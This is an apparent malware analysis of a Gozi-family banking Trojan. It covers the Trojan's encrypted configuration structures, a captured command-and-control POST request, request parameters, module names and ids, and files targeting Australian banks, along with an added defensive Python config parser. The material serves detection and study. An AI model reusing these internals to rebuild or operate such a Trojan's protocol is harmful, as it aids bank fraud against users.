SHA1:
A banking Trojan for 32- and 64-bit Windows versions. Its executable file contains an encrypted container which stores a loader and an initial configuration. From the PE file, the Trojan reads the Security Data Directory, which stores information on the configuration of modules:
struct cfginfo_t
{
DWORD size; //configuration size
WORD magic; //0x334A
WORD unk1; //unknown
};
Then the blocks themselves follow:
struct cfgblock_t
{
DWORD idname; //name of the plugin ^ key
DWORD size; //size of the plugin ^ key
DWORD key; //the key used to encrypt with XOR every field of this structure
DWORD rva; //rva of the data ^ key
};
The number of blocks is calculated according to the following formula:
n = (cfginfo_t.size - 0xC) / 0x10
The decrypted data is a public key in PolarSSL format; in PEM form it looks as follows:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDD3AfU4ayUEHchQ3H0W1/d3ziW
VNCFHWaAm8mJq6hQwn03GNGV7hOICH8h/+dZGEwYWVnRq128QMPZTIj0b+iqHKlM
sHzxEIZlWUVvnfbx6unDAC8aJXovmePrPvbHJ1FrplzlbILiPLvofh7pXzTdfcDQ
e3wfV7cbxJ3DXessqwIDAQAB
-----END PUBLIC KEY-----
The previous Gozi version left unused strings in the basic configuration of the Trojan.
To connect to a remote server, the Trojan needs the server address, a server key, a group name, a public key, and the two builds of the LOADER.dll library (x32/x64). Requests are encrypted with Serpent and then Base64-encoded, with some characters additionally substituted; server responses are encrypted with RSA + Serpent and compressed with aPLib.
The loader.dll library is then loaded, and data is sent to the command and control server in POST requests whose payload is in multipart/form-data format:
POST /index.html HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=b8bf4e8dfe2ca714
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Content-Length: 309
Host: 185.***.***.19
--b8bf4e8dfe2ca714
Content-Disposition: form-data; name="bjdu"
jR5u5cY2EI3FkzX/y1l2gdYYjDvqNnMdEva1W_/2BcENsVuze9Zb6mc/f9rkXZw1X/fXyeq8bAJpYM/0sthsZwlgF7yG3t3V/Vcxct0rTybjIqETZg94C/Kdk9NGIv0up_2FSQzWu5Au3/oYrMIKkqEXD_2Fa8a0JF_/2B63vuyz/zbp7ODpeVvi/5o2C_2F4VY/7C_2BX6DzWW/FeNdnBVU/S
--b8bf4e8dfe2ca714--
The User-Agent header contains the following fields:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0)
Gecko/20100101 Firefox/50.0
OS version 6.00
Subsystem version 1.00
The Trojan's authors built in a restriction: for the malicious program to work with ntdll.dll, the value of the “OS version” field in the PE header must be >= 6, i.e. Microsoft Windows 7 and later versions.
Requests are encrypted and carry the following parameters:
{'uptime': '1497', 'group': '1201117', 'type': '0', 'crc': '00000000', 'arc': '0', 'version': '300499', 'user': '137dfe28b759ae0de8853ec3503d35e9', 'soft': '2', 'id': '8576b0d0'}
where id is CRC-32/JAMCRC(plugname.upper()), i.e. the JAMCRC of the plugin name in uppercase. Response packets are also encrypted and, for some request types, compressed with aPLib.
The loader downloads the following basic modules:
- bl.dll 0x8576b0d0
- explorer.dll 0x224c6c42
- netwrk.dll 0x45a0fcd0
- rt.dll 0xd6306e08
- baseconfig 0xd722afcb
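As an added example (not code from the page or from the Trojan itself), the following Python parser reads a cfginfo_t/cfgblock_t table as the structures above describe it, undoes the per-block XOR, and resolves each decrypted idname by computing CRC-32/JAMCRC over the upper-cased module names listed on this page. It assumes the block table starts at offset 0xC (consistent with the count formula), that only idname, size and rva are XOR-ed while the key field is stored in the clear, and that "baseconfig" is hashed like a module name; the input blob is constructed, not taken from a sample.

```python
import struct
import zlib

CFGINFO_MAGIC = 0x334A          # magic value from cfginfo_t on the page
CFGINFO_FMT = "<IHH"            # DWORD size, WORD magic, WORD unk1
CFGBLOCK_FMT = "<IIII"          # DWORD idname, size, key, rva
CFGBLOCK_SIZE = struct.calcsize(CFGBLOCK_FMT)   # 0x10
TABLE_OFF = 0xC                 # assumption: first block at 0xC, matching n = (size - 0xC) / 0x10
# Module names listed on the page; used to resolve decrypted idname values back to names.
KNOWN_MODULES = ["bl.dll", "explorer.dll", "netwrk.dll", "rt.dll", "baseconfig",
                 "browsers.dll", "iexplore.dll", "firefox.dll", "microsoftedgecp.dll", "chrome.dll"]

def jamcrc(data: bytes) -> int:
    """CRC-32/JAMCRC: standard CRC-32 with the final XOR omitted (bitwise NOT of CRC-32)."""
    return zlib.crc32(data) ^ 0xFFFFFFFF

def plugin_id(name: str) -> int:
    """Module id as the page describes it: JAMCRC over the upper-cased module name."""
    return jamcrc(name.upper().encode("ascii"))

def parse_cfg_table(blob: bytes) -> list:
    """Parse the cfginfo_t header and the XOR-encrypted cfgblock_t entries that follow it."""
    size, magic, _unk1 = struct.unpack_from(CFGINFO_FMT, blob, 0)
    if magic != CFGINFO_MAGIC:
        raise ValueError("bad cfginfo magic 0x%04x" % magic)
    n = (size - 0xC) // CFGBLOCK_SIZE          # block count formula from the page
    names = {plugin_id(m): m for m in KNOWN_MODULES}
    blocks = []
    for i in range(n):
        idname, bsize, key, rva = struct.unpack_from(CFGBLOCK_FMT, blob, TABLE_OFF + i * CFGBLOCK_SIZE)
        # key is stored in the clear (assumption); idname, size and rva are XOR-ed with it
        idname, bsize, rva = idname ^ key, bsize ^ key, rva ^ key
        blocks.append({"id": idname, "name": names.get(idname, "unknown"), "size": bsize, "rva": rva})
    return blocks

def build_sample_table(entries, key=0x5A5A1234) -> bytes:
    """Constructed sample (not from a real binary): encrypt (name, size, rva) entries with one key."""
    body = b"".join(struct.pack(CFGBLOCK_FMT, plugin_id(n) ^ key, s ^ key, key, r ^ key)
                    for n, s, r in entries)
    size = TABLE_OFF + len(body)
    return struct.pack(CFGINFO_FMT, size, CFGINFO_MAGIC, 0) + b"\0" * (TABLE_OFF - 8) + body

if __name__ == "__main__":
    sample = build_sample_table([("bl.dll", 0x3000, 0x1A000), ("explorer.dll", 0x4800, 0x1D000)])
    for b in parse_cfg_table(sample):
        print("%-14s id=0x%08x size=0x%x rva=0x%x" % (b["name"], b["id"], b["size"], b["rva"]))
```

On a real sample, compare plugin_id() for each module name against the ids listed above to confirm the hashing rule before trusting the name resolution.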
The baseconfig module stores the basic configuration, which contains addresses of the additional command and control servers and a master key for the connection to the server.
The other modules have the following functions:
- explorer.dll: the main module of the Trojan. It loads and executes the remaining components using the basic plugins (bl.dll, rt.dll, netwrk.dll);
- bl.dll: web injections, various kinds of interaction with Windows named pipes, execution of files from memory, encryption;
- rt.dll: interaction with the Windows registry and with files, string operations;
- netwrk.dll: network functions.
The module explorer.dll executes several task types:
- Check for any updates for the Trojan;
- Download browser plugins used for web injections from a remote server;
- Download web-injection configurations from a remote server;
- Obtain personal tasks, including those requiring the download of additional plugins;
- Remote computer administration.
In order to perform web injections, the Trojan uses its own configurable browser plugins:
- browsers.dll 0xe6954637
- iexplore.dll 0x5f92dac2
- firefox.dll 0x309d98ff
- microsoftedgecp.dll 0x7f23179c
- chrome.dll 0x9eff4536
The web-injection configuration data is packed in a ZIP file and compressed with aPLib; the archive contains the following files:
au_com_bankofmelbourne_bbo.sig
au_com_banksa_bbo.sig
au_com_stgeorge_bbo.sig
Expro.sig
main.sig
transactive_corp.sig
transman_corp.sig
westpac_corp.sig